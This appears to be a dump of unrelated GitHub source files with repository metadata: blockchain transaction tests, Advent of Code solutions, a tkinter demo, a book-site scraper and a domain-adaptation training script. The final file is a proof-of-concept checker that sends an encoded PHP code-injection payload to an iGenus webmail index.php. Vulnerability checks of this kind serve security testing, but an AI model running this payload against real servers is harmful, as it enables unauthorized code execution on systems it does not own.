signature = ('0xed2e8602439eec57a84bb372c6de718d88d2c27f265d7c01fe59a940f9c44eb25f849639669897e376dca6b3e745f4d966'
'732f731b6ec20d908673ad882aeed301')
# Must be a string exact match
data = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(data), signature)
assert signed.ecrecover() == '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5'
def test_recover_signed_transaction_from_signed_output(ethereum_accounts):
transaction = Transaction()
signed = transaction.sign(ethereum_accounts[0].key)
signed = SignedTransaction(signed.raw_transaction, signed.signature)
assert signed.ecrecover() == '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5'
def test_recover_signed_transaction_from_payload(ethereum_accounts):
transaction = Transaction()
signed = transaction.sign(ethereum_accounts[0].key)
signed = SignedTransaction(**signed.payload)
assert signed.ecrecover() == '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5'
def test_sign_none():
transaction = Transaction()
with pytest.raises(InvalidKeyError):
transaction.sign(None)
def test_recover_empty_signature():
signed = SignedTransaction('', '')
with pytest.raises(InvalidSignatureError):
signed.ecrecover()
def test_recover_invalid_signature():
signed = SignedTransaction('', '0xaa')
with pytest.raises(InvalidSignatureError):
signed.ecrecover()
def test_recover_changed_body(ethereum_accounts):
signature = Transaction().sign(ethereum_accounts[0].key).signature
data = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {
'different': 'asdf'
}
}
signed = SignedTransaction(json.dumps(data), signature)
with pytest.raises(WrongSignatureError):
signed.ecrecover()
def test_recover_changed_signature(ethereum_accounts):
transaction = Transaction().sign(HexBytes(ethereum_accounts[0].key)).raw_transaction
signature = Transaction().sign(ethereum_accounts[1].key).signature
signed = SignedTransaction(transaction, signature)
with pytest.raises(WrongSignatureError):
signed.ecrecover()
def test_load_transaction_string():
signed = SignedTransaction('this is not json', bytes([0] * 65))
with pytest.raises(json.JSONDecodeError):
signed.transaction()
def test_load_transaction_schema_mismatch():
transaction = {
'name': 'polyswarmtransaction.transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
with pytest.raises(ValidationError):
signed.transaction()
def test_load_transaction_missing_module():
transaction = {
'name': 'polyswarmtransaction.no:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
with pytest.raises(UnsupportedTransactionError):
signed.transaction()
def test_load_transaction_missing_class():
transaction = {
'name': 'polyswarmtransaction.transaction:NoTransaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
with pytest.raises(UnsupportedTransactionError):
signed.transaction()
def test_load_transaction_non_transaction():
transaction = {
'name': 'polyswarmtransaction.transaction:SignedTransaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
with pytest.raises(UnsupportedTransactionError):
signed.transaction()
def test_load_transaction():
transaction = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
assert isinstance(signed.transaction(), Transaction)
assert not DeepDiff(signed.transaction().data, Transaction().data, ignore_order=True)
|
polyswarm/polyswarm-transaction
|
tests/test_transaction.py
|
test_transaction.py
|
py
| 6,888 |
python
|
en
|
code
| 1 |
github-code
|
6
|
209544494
|
recipes = [3, 7]
duendes= [0, 1]
longitud=323081
#longitud=5
while len(recipes) < longitud + 10:
new = recipes[duendes[0]] + recipes[duendes[1]]
recipes += [int(c) for c in str(new)]
duende1=(duendes[0]+1+recipes[duendes[0]])%len(recipes)
duende2=(duendes[1]+1+recipes[duendes[1]])%len(recipes)
duendes= [duende1,duende2]
#print(recipes)
print("Part 1:")
print("".join(str(n) for n in recipes[longitud : longitud + 10]))
#part 2
puzzle_input =str(longitud)
recipes = [3, 7]
duendes = [0, 1]
input_found = None
while input_found is None:
actual = ''.join(str(e) for e in recipes[-len(puzzle_input) - 1 : -1])
actual2= ''.join(str(e) for e in recipes[-len(puzzle_input): -1])
#print(actual)
#print(actual2)
if actual==puzzle_input:
input_found = -len(puzzle_input) - 1
break
if actual2==puzzle_input:
input_found = -len(puzzle_input)
break
new = recipes[duendes[0]] + recipes[duendes[1]]
recipes += [int(c) for c in str(new)]
duende1=(duendes[0]+1+recipes[duendes[0]])%len(recipes)
duende2=(duendes[1]+1+recipes[duendes[1]])%len(recipes)
duendes= [duende1,duende2]
print(input_found)
print("Part 2: "+str(len(recipes) + input_found))
|
heyheycel/advent-of-code
|
2018/code_day14.py
|
code_day14.py
|
py
| 1,164 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28743291670
|
import tkinter
from turtle import right
ventana=tkinter.Tk()
ventana.title("Ventana de pruebas")
##ventana.resizable(0,0) prevents the window from being resized
##ventana.iconbitmap("cualquiercosa.ico") this is how the application icon can be changed :d
ventana.geometry("500x300")
ventana.config(bg="black")
miframe=tkinter.Frame()
miframe.pack(fill="both",expand="true")
miframe.config(bg="white")
miframe.config(width="800",height="200")
miframe.config(bd=35)
miframe.config(relief="sunken")
miframe.config(cursor="pirate")
ventana=tkinter.mainloop()
##rename the .py file to .pyw so that only the application window is shown (no console)
|
SebastianTrujillo21/tkinter_practice
|
1er_proyecto/primera.py
|
primera.py
|
py
| 633 |
python
|
es
|
code
| 0 |
github-code
|
6
|
32942155774
|
"""
COMP.CS.100 Programming 1.
Stuart Student, [email protected], student id 150360360.
Solution of task 2.
"""
def main():
num_of_days = int(input('Enter the number of days: '))
data = 0
mean = 0
counter = 0
for number in range(1, num_of_days + 1):
running_length = float(input(f'Enter day {number} running length: '))
if running_length != 0:
data = data + running_length
mean = data / num_of_days
counter = 0
else:
counter += 1
if counter < 3:
continue
else:
break
print()
if counter == 3:
print('You had too many consecutive lazy days!')
elif mean < 3:
print(f"Your running mean of {mean:.2f} km was too low!")
else:
print(f"You were persistent runner! With a mean of {mean:.2f} km.")
if __name__ == '__main__':
main()
|
hamedtea/python_assignments
|
analyzer.py
|
analyzer.py
|
py
| 925 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70879515068
|
import aoc_cj.aoc2016.day13 as d
EXAMPLE_SPACE = """
.#.####.##
..#..#...#
#....##...
###.#.###.
.##..#..#.
..##....#.
#...##.###
""".strip()
def test_is_wall():
lines = EXAMPLE_SPACE.splitlines()
fav_num = 10
for y in range(len(lines)):
for x in range(len(lines[0])):
            assert lines[y][x] == ("." if d.is_open(x, y, fav_num) else "#")
def test_a():
assert d.parta("10", target_pos=(7, 4)) == 11
|
cj81499/advent-of-code
|
tests/aoc2016/y2016d13_test.py
|
y2016d13_test.py
|
py
| 433 |
python
|
en
|
code
| 2 |
github-code
|
6
|
18242919824
|
# Text justification
def limpa_texto(texto):
    '''Removes redundant whitespace from the original text.
    No dependencies
    Parameters: str
    Returns: str
    '''
return ' '.join(texto.split())
def corta_texto(texto, largura):
    '''Splits the text at the last complete word that fits within the given width.
    No dependencies
    Parameters: str, int
    Returns: (str, str)
    '''
palavras = texto.split()
len_total = 0
i = 0
    # Find the last complete word that fits within the desired width
for i, palavra in enumerate(palavras):
len_total += len(palavra)
if largura < len_total:
break
        # Account for the space between words
len_total += 1
if len(texto) <= largura:
i += 1
return ' '.join(palavras[:i]), ' '.join(palavras[i:])
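# Worked example (added for illustration):
#   corta_texto('ola mundo bom dia', 9) -> ('ola mundo', 'bom dia')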
def insere_espacos(texto, largura):
    '''Pads the string with spaces to justify it to the given width.
    No dependencies
    Parameters: str, int
    Returns: str
    '''
palavras = texto.split()
    # numero_espacos -> number of gaps between consecutive words
    # espaco_para_preencher -> number of blank characters that must be added
numero_espacos = len(palavras)-1
espaco_para_preencher = largura - (len(texto)-numero_espacos)
if len(palavras) > 1:
espaco_default = espaco_para_preencher // numero_espacos
espacos_restantes = espaco_para_preencher - (numero_espacos * espaco_default)
mapa_espacos = [espaco_default] * numero_espacos
for i in range(espacos_restantes):
mapa_espacos[i] += 1
palavra_final = ''
for i, palavra in enumerate(palavras):
if i < numero_espacos:
palavra_final += palavra + ' '*mapa_espacos[i]
else:
palavra_final += palavra
return palavra_final
else:
        # If there is only one word, append the required spaces at the end
return texto + ' '*espaco_para_preencher
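# Worked example (added for illustration):
#   insere_espacos('ola mundo', 12) -> 'ola    mundo' (the single gap absorbs the 4 extra spaces)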
def justifica_texto(texto, largura):
    '''Justifies a string to the specified width.
    Depends on: limpa_texto(), corta_texto(), insere_espacos()
    Parameters: str, int
    Returns: tuple
    '''
if type(texto) != str or type(largura) != int or len(texto) == 0\
or largura <= 0 or not(all(len(palavra) <= largura for palavra in texto.split())):
raise ValueError('justifica_texto: argumentos invalidos')
texto_justificado = corta_texto(limpa_texto(texto), largura)
tuplo_justificado = ()
def insere_espacos_fim(txt):
espaco_para_preencher = largura - (len(txt))
return txt + ' '*espaco_para_preencher
while True:
        # Check whether this is the last line, which is justified differently
if len(texto_justificado[1]) > 0:
tuplo_justificado += (insere_espacos(texto_justificado[0], largura),)
texto_justificado = texto_justificado[1]
texto_justificado = corta_texto(texto_justificado, largura)
else:
tuplo_justificado += (insere_espacos_fim(texto_justificado[0]),)
break
return tuplo_justificado
# D'Hondt method
def calcula_quocientes(votos, deputados):
    '''Computes each party's quotients according to the D'Hondt method.
    No dependencies
    Parameters: dict, int
    Returns: dict
    '''
quocientes = votos.copy()
for partido, num_votos in quocientes.items():
quocientes[partido] = [float(num_votos)]
for i in range(1, deputados):
quocientes[partido].append(float(quocientes[partido][0] / (i+1)))
return quocientes
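# Worked example of the D'Hondt quotients (added for illustration):
#   calcula_quocientes({'A': 12, 'B': 6}, 3) -> {'A': [12.0, 6.0, 4.0], 'B': [6.0, 3.0, 2.0]}
#   With 3 seats, atribui_mandatos then awards 2 seats to 'A' and 1 to 'B'.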
def atribui_mandatos(votos, deputados):
    '''Using the computed quotients, assigns mandates to the parties
    according to the results obtained in the respective votes.
    Depends on: calcula_quocientes()
    Parameters: dict, int
    Returns: list
    '''
quocientes = calcula_quocientes(votos, deputados)
mandatos = list()
    # Sort the parties in ascending order of total votes
    # so that ties are easier to break
partidos_ordenados = dict(sorted(quocientes.items(), key=lambda votos : votos[1][0]))
while len(mandatos) < deputados:
partido_a_eleger = ('', 0)
for partido, num_votos in partidos_ordenados.items():
if num_votos[0] > partido_a_eleger[1]:
partido_a_eleger = (partido, num_votos[0])
partidos_ordenados[partido_a_eleger[0]] = partidos_ordenados[partido_a_eleger[0]][1:]
mandatos.append(partido_a_eleger[0])
return mandatos
def obtem_partidos(informacao):
    '''Gets every party that took part in the elections.
    No dependencies
    Parameters: dict
    Returns: list
    '''
partidos_final = set()
for circulo in informacao.values():
for partidos in circulo['votos'].keys():
partidos_final.add(partidos)
partidos_final = sorted(partidos_final)
return partidos_final
def obtem_resultado_eleicoes(informacao):
    '''Computes the election results.
    Depends on: atribui_mandatos(), obtem_partidos()
    (Indirectly): calcula_quocientes()
    Parameters: dict
    Returns: list
    '''
    # Input validation
if type(informacao) != dict or len(informacao) == 0:
raise ValueError('obtem_resultado_eleicoes: argumento invalido')
for circulo in informacao.values():
if type(circulo) != dict or len(circulo) != 2\
or 'deputados' not in circulo.keys() or 'votos' not in circulo.keys()\
or type(circulo['deputados']) != int or type(circulo['votos']) != dict\
or circulo['deputados'] <= 0 or len(circulo['votos']) == 0:
raise ValueError('obtem_resultado_eleicoes: argumento invalido')
if not all(type(nome_circulo)==str and len(nome_circulo)>0 for nome_circulo in informacao.keys()):
raise ValueError('obtem_resultado_eleicoes: argumento invalido')
if not all(((type(votos) == int) and votos > 0 and (type(partido) == str)) for (partido, votos) in circulo['votos'].items()):
raise ValueError('obtem_resultado_eleicoes: argumento invalido')
resultados = {(partido):(partido, 0, 0) for partido in obtem_partidos(informacao)}
for circulo in informacao.values():
votos = circulo['votos']
deputados = circulo['deputados']
resultado_circulo = atribui_mandatos(votos, deputados)
for partido, num_votos in votos.items():
votos_atuais = resultados[partido][2]
deputados_atuais = resultados[partido][1]
resultados[partido] = (partido, deputados_atuais + resultado_circulo.count(partido), votos_atuais + num_votos)
resultados = list(resultados.values())
resultados = sorted(resultados, key=lambda resultado: (resultado[1],resultado[2]), reverse=True)
return resultados
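# Minimal example (illustrative): a single electoral circle with 2 seats.
# Each tuple holds (party, seats won, total votes), sorted by seats and then votes.
# >>> obtem_resultado_eleicoes({'Lisboa': {'deputados': 2, 'votos': {'A': 100, 'B': 60}}})
# [('A', 1, 100), ('B', 1, 60)]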
# Solving systems of equations
def produto_interno(t1, t2):
    '''Computes the inner product of two vectors.
    No dependencies
    Parameters: tuple, tuple
    Returns: float
    '''
return sum(float(t1[i]*t2[i]) for i in range(len(t1)))
def verifica_convergencia(matriz, constantes, solucao_atual, precisao):
    '''Checks the precision of the proposed solution for
    a given system, represented by a matrix and a vector
    of constants.
    Depends on: produto_interno()
    Parameters: tuple, tuple, tuple, float
    Returns: bool
    '''
erros = []
    # Compute the error for each row of the augmented matrix
for i in range(len(constantes)):
resultado_linha = produto_interno(matriz[i], solucao_atual)
erros.append(abs(resultado_linha-constantes[i]))
return all(e<precisao for e in erros)
def retira_zeros_diagonal(matriz, constantes):
    '''Removes the zeros from the main diagonal of a
    matrix by performing row swaps.
    No dependencies
    Parameters: tuple, tuple
    Returns: (tuple, tuple)
    '''
    i = 0
    n_matriz = list(matriz)
    n_constantes = list(constantes)
    while i < len(matriz):
        # Restart the search for a swap candidate on every row
        j = 0
while n_matriz[i][i] == 0 and j < len(n_matriz):
if n_matriz[j][i] != 0 and n_matriz[i][j] != 0:
n_matriz[i], n_matriz[j] = n_matriz[j], n_matriz[i]
n_constantes[i], n_constantes[j] = n_constantes[j], n_constantes[i]
j = 0
j += 1
i += 1
return tuple(n_matriz), tuple(n_constantes)
def eh_diagonal_dominante(matriz):
    '''Checks whether a matrix is diagonally dominant.
    No dependencies
    Parameters: tuple
    Returns: bool
    '''
linha_atual = []
for i in range(len(matriz)):
linha_atual = list(matriz[i])
elemento_diagonal = linha_atual.pop(i)
linha_atual = [abs(el) for el in linha_atual]
if abs(elemento_diagonal) < sum(linha_atual):
return False
return True
def resolve_sistema(matriz, constantes, precisao):
    '''Solves a system of linear equations using the
    Jacobi method.
    Depends on: retira_zeros_diagonal(), eh_diagonal_dominante(),
    verifica_convergencia(), produto_interno()
    Parameters: tuple, tuple, float
    Returns: tuple
    '''
    # Validate the matrix
if type(matriz) != tuple or len(matriz)==0 or len(matriz[0]) != len(matriz):
raise ValueError('resolve_sistema: argumentos invalidos')
for linha in matriz:
if type(linha) != tuple or len(linha) != len(matriz[0]):
raise ValueError('resolve_sistema: argumentos invalidos')
else:
for valor in linha:
if (type(valor) != int and type(valor) != float):
raise ValueError('resolve_sistema: argumentos invalidos')
    # Validate the constants
if type(constantes) != tuple or len(constantes)==0 or len(constantes) != len(matriz):
raise ValueError('resolve_sistema: argumentos invalidos')
if not all((type(c) == int or type(c) == float) for c in constantes):
raise ValueError('resolve_sistema: argumentos invalidos')
    # Validate the precision
if type(precisao) != float or precisao <= 0:
raise ValueError('resolve_sistema: argumentos invalidos')
nova_matriz, novas_constantes = retira_zeros_diagonal(matriz, constantes)
    # Validate the diagonal
if not eh_diagonal_dominante(nova_matriz):
raise ValueError('resolve_sistema: matriz nao diagonal dominante')
estimativas = [[0 for c in constantes]]
while not verifica_convergencia(nova_matriz, novas_constantes, estimativas[-1], precisao):
novas_estimativas = list()
for i in range(len(estimativas[0])):
f = produto_interno(nova_matriz[i], estimativas[-1])
nova_estimativa = estimativas[-1][i] + (novas_constantes[i] - f) / nova_matriz[i][i]
novas_estimativas.append(nova_estimativa)
estimativas.append(novas_estimativas)
return tuple(estimativas[-1])
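# Usage sketch (illustrative): the diagonally dominant system
#   2x +  y = 3
#    x + 3y = 4
# has exact solution x = y = 1, so the Jacobi iteration above converges to
# values within the requested precision of (1.0, 1.0).
# >>> resolve_sistema(((2.0, 1.0), (1.0, 3.0)), (3.0, 4.0), 1e-6)   # ~ (1.0, 1.0)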
|
IDK04/Projeto-fp-1
|
main.py
|
main.py
|
py
| 11,418 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
16734122984
|
from typing import Any
from fastapi import FastAPI, Response, Request
from pathlib import Path
from pydantic import BaseModel
from autogoal.utils._storage import inspect_storage
import uvicorn
from autogoal_remote.distributed.proxy import loads, dumps, encode, decode
class Body(BaseModel):
values: Any
app = FastAPI()
@app.get("/input")
async def input(request: Request):
"""
Returns the model input type
"""
return {
"semantic type name": str(request.app.model.best_pipeline_.input_types),
"pickled data": dumps(
request.app.model.best_pipeline_.input_types, use_dill=True
),
}
@app.get("/output")
async def output(request: Request):
"""
Returns the model output type
"""
return {
"semantic type name": str(
request.app.model.best_pipeline_.algorithms[-1].__class__.output_type()
),
"pickled data": dumps(
request.app.model.best_pipeline_.algorithms[-1].__class__.output_type(),
use_dill=True,
),
}
@app.get("/inspect")
async def inspect(request: Request):
"""
Returns the model inspect command
"""
return {"data": str(inspect_storage(Path(request.app.model.export_path)))}
@app.post("/")
async def eval(t: Body, request: Request):
"""
Returns the model prediction over the provided values
"""
model = request.app.model
data = loads(t.values)
result = model.predict(data)
return {"data": dumps(result)}
def run(model, ip=None, port=None):
"""
Starts HTTP API with specified model.
"""
app.model = model
uvicorn.run(app, host=ip or "0.0.0.0", port=port or 8000)
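# Client-side sketch (illustrative, not part of the server API): assumes a server
# started with run(...) is reachable at `url` and that the `requests` package is
# installed; it reuses the module's own dumps/loads helpers for (de)serialization.
def example_predict(values, url="http://localhost:8000/"):
    """Post `values` to the running server and return the decoded prediction."""
    import requests  # local import: only needed for this illustrative helper

    response = requests.post(url, json={"values": dumps(values)})
    response.raise_for_status()
    return loads(response.json()["data"])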
|
autogoal/autogoal-remote
|
autogoal_remote/production/server.py
|
server.py
|
py
| 1,689 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27516277876
|
from discord.ext import commands
from databases.database_manager import db
class Hive(commands.Cog):
def __init__(self, bot):
self.bot = bot
self._last_member = None
@commands.command(name='get_map_id', help='<map_name>',
aliases=["get_id","gmi"])
async def get_map_id(self, ctx, map_name):
map_name = map_name.title()
map_id = db.translate(map_name)
if map_id is None:
await ctx.send("Sorry, I could not find `{}` in the database 🙁".format(map_name))
return
else:
await ctx.send("The id for the `{}` map is `{}`".format(map_name, map_id))
def setup(bot):
bot.add_cog(Hive(bot))
|
tintin10q/hive-discord-bot
|
commands/get_map_id.py
|
get_map_id.py
|
py
| 710 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16733135761
|
import argparse
import logging
import os
import sys
import time
from urllib.parse import urljoin, urlparse, unquote, parse_qs
import requests
import urllib3
from bs4 import BeautifulSoup
from pathvalidate import sanitize_filename
logger = logging.getLogger(__name__)
class BookError(Exception):
def __init__(self, text):
self.txt = text
def main():
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
library_url = 'https://tululu.org'
books_path = 'books/'
os.makedirs(books_path, exist_ok=True)
books_images_path = 'images/'
os.makedirs(books_images_path, exist_ok=True)
parser = argparse.ArgumentParser(description='парсер онлайн-библиотеки https://tululu.org/')
parser.add_argument('start_id', nargs='?', default='1', type=int, help='с какой страницы начинать')
parser.add_argument('end_id', nargs='?', default='1000', type=int, help='по какую страницу качать')
args = parser.parse_args()
urllib3.disable_warnings()
for book_number in range(args.start_id, args.end_id + 1):
book_url = f'{library_url}/b{book_number}/'
try:
logger.info(f'ищем книгу по адресу {book_url}')
response = requests.get(book_url, verify=False)
response.raise_for_status()
check_for_redirect(response)
book = parse_book_page(response.text, book_url)
download_txt(f'{library_url}/txt.php?id={book_number}', book_number, book['title'], books_path)
download_image(book['image_url'], books_images_path)
except requests.HTTPError as e:
print(e, file=sys.stderr)
logger.exception(e)
except requests.ConnectionError as e:
logger.exception(e)
print(e, file=sys.stderr)
time.sleep(10)
except requests.TooManyRedirects:
print('обнаружен редирект', file=sys.stderr)
except KeyboardInterrupt:
print('Скачивание остановлено')
sys.exit()
except BookError as e:
logger.exception(e)
print(e, file=sys.stderr)
def check_for_redirect(response):
if len(response.history) > 0:
logger.info('Такой страницы не существует.')
raise requests.TooManyRedirects
def parse_book_page(content, book_url):
soup = BeautifulSoup(content, 'lxml')
title_author_string = soup.select_one('.ow_px_td h1').text
book_title, book_author = map(lambda title: title.strip(), title_author_string.split('::'))
book_image_src = soup.select_one('.bookimage img')['src']
book_image_url = urljoin(book_url, book_image_src)
search_text_result = soup.select_one('table.d_book a[title$=txt]')
if not search_text_result:
raise BookError('Текст этой книги отсутствует')
book_text_url = search_text_result['href']
parsed_book_query = parse_qs(urlparse(book_text_url).query)
book_id = parsed_book_query['id'][0]
comment_tags = soup.select('.texts .black')
book_comments = [comment_tag.text for comment_tag in comment_tags]
genre_tags = soup.select('span.d_book a')
book_genres = [genre_tag.text for genre_tag in genre_tags]
book = {
'title': book_title,
'author': book_author,
'comments': book_comments,
'genres': book_genres,
'image_url': book_image_url,
'id': book_id,
'text_url': urljoin(book_url, book_text_url)
}
return book
def download_txt(url, book_id, filename, folder='books/'):
"""Функция для скачивания текстовых файлов.
Args:
url (str): Cсылка на текст, который хочется скачать.
book_id (int): Уникальный id книги
filename (str): Имя файла, с которым сохранять.
folder (str): Папка, куда сохранять.
Returns:
str: Путь до файла, куда сохранён текст.
"""
file_path = os.path.join(folder, f'{book_id}. {sanitize_filename(filename)}.txt')
response = requests.get(url, verify=False)
response.raise_for_status()
check_for_redirect(response)
with open(file_path, 'wb') as file:
file.write(response.content)
logger.info(f'скачали книгу: {file_path}')
return file_path
def download_image(url, folder='images/', rewrite=False):
response = requests.get(url, verify=False)
response.raise_for_status()
check_for_redirect(response)
file_path = os.path.join(folder, os.path.basename(unquote(urlparse(url).path)))
if not rewrite and os.path.exists(file_path):
return file_path
with open(file_path, 'wb') as file:
file.write(response.content)
logger.info(f'скачали файл: {file_path}')
return file_path
if __name__ == '__main__':
main()
|
petrovskydv/parse_library
|
parse_tululu.py
|
parse_tululu.py
|
py
| 5,093 |
python
|
en
|
code
| 0 |
github-code
|
6
|
15521199342
|
state = []
with open('D6_input.txt', 'r') as fopen:
state = list(map(int, fopen.readline().rstrip().split(',')))
for i in range(256):
for ind, fish_state in enumerate(state):
if fish_state == 0:
state[ind] = 6
state.append(9)
else:
state[ind] -= 1
print(len(state))
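# Note: the list above grows exponentially over 256 days; an equivalent
# constant-memory version only tracks how many fish share each timer value.
# Sketch (same answer; shown as a comment so it does not re-run on the
# already-simulated list, and `initial_state` stands for the freshly parsed input):
#
#   from collections import Counter
#   timers = Counter(initial_state)
#   for _ in range(256):
#       spawning = timers.pop(0, 0)
#       timers = Counter({t - 1: c for t, c in timers.items()})
#       timers[6] += spawning                # parents reset to 6
#       timers[8] += spawning                # newborns start at 8
#   print(sum(timers.values()))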
|
probablyanasian/advent-of-code
|
2021/D6/Day_6A.py
|
Day_6A.py
|
py
| 284 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73787200189
|
import DaNN
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm import tqdm
import argparse
import data_loader
import mmd
import scipy.io
import json
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
LEARNING_RATE = 0.02
MOMEMTUN = 0.05
L2_WEIGHT = 0.003
DROPOUT = 0.5
N_EPOCH = 200
BATCH_SIZE = [64, 64]
LAMBDA = 0.5
GAMMA = 10 ** 3  # exponentiation; the original "10 ^ 3" is bitwise XOR in Python, i.e. 9
RESULT_TRAIN = []
RESULT_TEST = []
log_train = open('log_train_a-w.txt', 'w')
log_test = open('log_test_a-w.txt', 'w')
parser = argparse.ArgumentParser()
parser.add_argument("--seed", type = int, default=0)
parser.add_argument("--person", type=int, default=1)
args = parser.parse_args()
def mmd_loss(x_src, x_tar):
return mmd.mix_rbf_mmd2(x_src, x_tar, [GAMMA])
def train(model, optimizer, epoch, data_src, data_tar):
total_loss_train = 0
criterion = nn.CrossEntropyLoss()
correct = 0
batch_j = 0
list_src, list_tar = list(enumerate(data_src)), list(enumerate(data_tar))
for batch_id, (data, target) in enumerate(data_src):
_, (x_tar, y_target) = list_tar[batch_j]
data, target = data.to(DEVICE), target.to(DEVICE)
x_tar, y_target = x_tar.to(DEVICE), y_target.to(DEVICE)
model.train()
y_src, x_src_mmd, x_tar_mmd = model(data, x_tar)
loss_c = criterion(y_src, target)
loss_mmd = mmd_loss(x_src_mmd, x_tar_mmd)
pred = y_src.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
loss = loss_c + LAMBDA * loss_mmd
optimizer.zero_grad()
loss.backward()
optimizer.step()
total_loss_train += loss.data
res_i = 'Epoch: [{}/{}], Batch: [{}/{}], loss: {:.6f}'.format(
epoch, N_EPOCH, batch_id + 1, len(data_src), loss.data
)
batch_j += 1
if batch_j >= len(list_tar):
batch_j = 0
total_loss_train /= len(data_src)
acc = correct * 100. / len(data_src.dataset)
res_e = 'Epoch: [{}/{}], training loss: {:.6f}, correct: [{}/{}], training accuracy: {:.4f}%'.format(
epoch, N_EPOCH, total_loss_train, correct, len(data_src.dataset), acc
)
tqdm.write(res_e)
log_train.write(res_e + '\n')
RESULT_TRAIN.append([epoch, total_loss_train, acc])
return model
def test(model, data_tar, e):
total_loss_test = 0
correct = 0
criterion = nn.CrossEntropyLoss()
with torch.no_grad():
for batch_id, (data, target) in enumerate(data_tar):
data, target = data.to(DEVICE),target.to(DEVICE)
model.eval()
ypred, _, _ = model(data, data)
loss = criterion(ypred, target)
pred = ypred.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
total_loss_test += loss.data
accuracy = correct * 100. / len(data_tar.dataset)
res = 'Test: total loss: {:.6f}, correct: [{}/{}], testing accuracy: {:.4f}%'.format(
total_loss_test, correct, len(data_tar.dataset), accuracy
)
tqdm.write(res)
RESULT_TEST.append([e, total_loss_test, accuracy])
log_test.write(res + '\n')
return accuracy / 100.
def dataset_load(batch_size = 64, person = args.person):
X_source = np.array([])
y_source = np.array([])
for i in range(10):
data = scipy.io.loadmat('../train/%d.mat'%(i+1))['de_feature']
label = scipy.io.loadmat('../train/%d.mat'%(i+1))['label']
if i == 0:
X_source = data
y_source = label
else:
X_source = np.vstack((X_source, data))
y_source = np.vstack((y_source, label))
X_source = (X_source - np.min(X_source, axis=0)) / (np.max(X_source, axis=0) - np.min(X_source, axis=0))
X_source = torch.from_numpy(X_source).float()
y_source = torch.from_numpy(y_source).long().squeeze()
source_dataset = torch.utils.data.TensorDataset(X_source, y_source)
X_target = scipy.io.loadmat('../test/%d.mat'%(10 + person))['de_feature']
y_target = scipy.io.loadmat('../test/%d.mat'%(10 + person))['label']
X_target = (X_target - np.min(X_target, axis=0)) / (np.max(X_target, axis=0) - np.min(X_target, axis=0))
X_target = torch.from_numpy(X_target).float()
y_target = torch.from_numpy(y_target).long().squeeze()
target_dataset = torch.utils.data.TensorDataset(X_target, y_target)
return source_dataset, target_dataset
if __name__ == '__main__':
torch.manual_seed(args.seed)
source_dataset, target_dataset = dataset_load(person=args.person)
data_src = torch.utils.data.DataLoader(dataset=source_dataset,batch_size=64,shuffle=True,num_workers=1, drop_last = True)
data_tar = torch.utils.data.DataLoader(dataset=target_dataset,batch_size=64,shuffle=True,num_workers=1, drop_last = True)
model = DaNN.DaNN(n_input=310, n_hidden=512, n_class=4)
model = model.to(DEVICE)
optimizer = optim.SGD(
model.parameters(),
lr=LEARNING_RATE,
momentum=MOMEMTUN,
weight_decay=L2_WEIGHT
)
acc_list = []
for e in tqdm(range(1, N_EPOCH + 1)):
model = train(model=model, optimizer=optimizer,
epoch=e, data_src=data_src, data_tar=data_tar)
acc = test(model, data_tar, e)
acc_list.append(acc.item())
jd = {"test_acc": acc_list}
with open(str(args.seed)+'/acc'+str(args.person)+'.json', 'w') as f:
json.dump(jd, f)
torch.save(model, 'model_dann.pkl')
log_train.close()
log_test.close()
res_train = np.asarray(RESULT_TRAIN)
res_test = np.asarray(RESULT_TEST)
np.savetxt('res_train_a-w.csv', res_train, fmt='%.6f', delimiter=',')
np.savetxt('res_test_a-w.csv', res_test, fmt='%.6f', delimiter=',')
|
comprehensiveMap/EI328-project
|
DaNN_/main.py
|
main.py
|
py
| 5,846 |
python
|
en
|
code
| 5 |
github-code
|
6
|
37429210278
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: iGenus mail system unauthenticated arbitrary code execution
referer: http://www.wooyun.org/bugs/wooyun-2015-0156126
author: Lucifer
description: /home/webmail/igenus/include/login_inc.php does not validate the base64-encoded parameter, allowing a shell to be written
'''
import sys
import requests
class igenus_code_exec_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/index.php?selTpl=YWF8YWFhJzsKcGhwaW5mbygpOyM="
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"Configuration File (php.ini) Path" in req.text:
return "[+]存在igenus命令执行漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = igenus_code_exec_BaseVerify(sys.argv[1])
testVuln.run()
|
